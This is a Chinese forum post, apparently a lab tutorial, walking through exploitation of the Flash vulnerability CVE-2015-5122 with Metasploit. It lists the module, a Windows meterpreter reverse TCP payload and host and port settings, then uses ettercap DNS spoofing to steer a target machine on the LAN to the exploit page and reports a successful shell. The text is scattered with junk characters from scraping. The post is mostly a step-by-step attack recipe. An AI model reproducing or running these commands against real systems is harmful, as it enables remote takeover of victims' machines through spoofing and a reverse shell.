cve2015-5122漏洞实例演示虚拟机

admin · 发表于 2018-10-20 20:28:02

+ H5 v+ N9 v0 r& l 二、cve2015-5122漏洞实例演示虚拟机 . O: _. C# P; V# E2 g

% [; F$ Z9 D7 L# W6 e 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： 7 k+ _# B2 x$ T

* u% W# _0 U9 u) l search cve-2015-5122如图： ! r* ~3 a& y' l7 t

- T! `' P! d. o) u) e$ u- T 9 ~4 t1 |9 `) U. T5 a! n

+ W4 r, g) Z G 下面我们敲如下命令： 5 ^. Y: @/ F# ?

8 X7 g) e* R ` use exploit/multi/browser/adobe_flash_opaque_background_uaf % ]3 H4 W M% l

. p! d6 F! a0 m set PAYLOAD windows/meterpreter/reverse_tcp 9 Q( H/ G: D: @ a( i& e

0 m6 q$ L% N2 h" O" X: s6 j2 f4 k set LHOST 192.168.0.109 1 Q7 A( j/ p+ x) G( _/ ` c

% Z" V% o9 O2 q1 c set URIPATH / /*根目录*/ , J7 \" w/ ^+ X/ F

! o8 {# F- o8 O( X9 O set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 - R/ Z$ k% Z1 Y

4 e$ i3 q( D' ~) D3 g set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 . `' O" ~+ K& S( ^

: z$ b( p8 Z5 ]5 G' N+ s6 [7 ?# R 然后show options如图： ' I# `7 ~$ ]( J9 `$ j

) H$ r7 i s0 V4 _ 7 n! Q# { S. o; H; Q

% J* |8 F- Q# G 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
2 R v0 S: L ~# K; J& j; ^0 B9 y + {) L% T a( |3 c0 ~! [

; ?; \- X+ @9 t6 @" p 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 ; H1 B* u2 m7 O+ s9 w! b+ k" U

: x% Q0 C b, h2 s2 _ Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf ( u3 C2 T! M' X8 ]

9 s ^1 ^# o( j" E; H1 j # W& W/ J( }: \/ ?- s

0 y$ g- {; h# S% @& q9 o 成功了，这时候我们断开ettercap，如图： 6 A( m3 y3 X5 P. |

; r: q7 w t1 ]" D6 [7 t) A * g" d; L# Y: h! g3 h$ p

7 S# p/ b0 f% N0 q7 ?0 c Screenshot如图： 4 D/ L5 w9 {- X. k, T

6 ?6 P; ?& @' r, a) I8 \* T3 m- m' e $ u. ]" C+ T6 b6 p# V4 Z

( }4 \ M, h6 q: C) p& g1 ? }9 ^ ) n+ v5 R; t; o; c" ]# V

		自动登录	找回密码
密码			立即注册